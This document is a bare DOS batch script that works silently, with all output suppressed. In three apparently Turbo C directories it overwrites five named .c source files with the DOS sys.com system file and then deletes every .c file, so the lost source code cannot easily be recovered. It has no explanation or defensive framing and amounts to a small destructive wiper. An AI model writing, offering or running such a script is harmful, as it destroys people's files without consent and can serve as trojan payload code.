@echo off
c:
cd\tc\bc.NUL
copy c:\dos\sys.com mngrboot.c>nul
copy c:\dos\sys.com fatrsave.c>nul
copy c:\dos\sys.com lastlin2.c>nul
copy c:\dos\sys.com loadll.c>nul
copy c:\dos\sys.com twingra.c>nul
del *.c>nul
c:
cd\tc\sc>nul
copy c:\dos\sys.com mngrboot.c>nul
copy c:\dos\sys.com fatrsave.c>nul
copy c:\dos\sys.com lastlin2.c>nul
copy c:\dos\sys.com loadll.c>nul
copy c:\dos\sys.com twingra.c>nul
del *.c>nul
c:
cd\tc\e>nul
copy c:\dos\sys.com mngrboot.c>nul
copy c:\dos\sys.com fatrsave.c>nul
copy c:\dos\sys.com lastlin2.c>nul
copy c:\dos\sys.com loadll.c>nul
copy c:\dos\sys.com twingra.c>nul
del *.c>nul

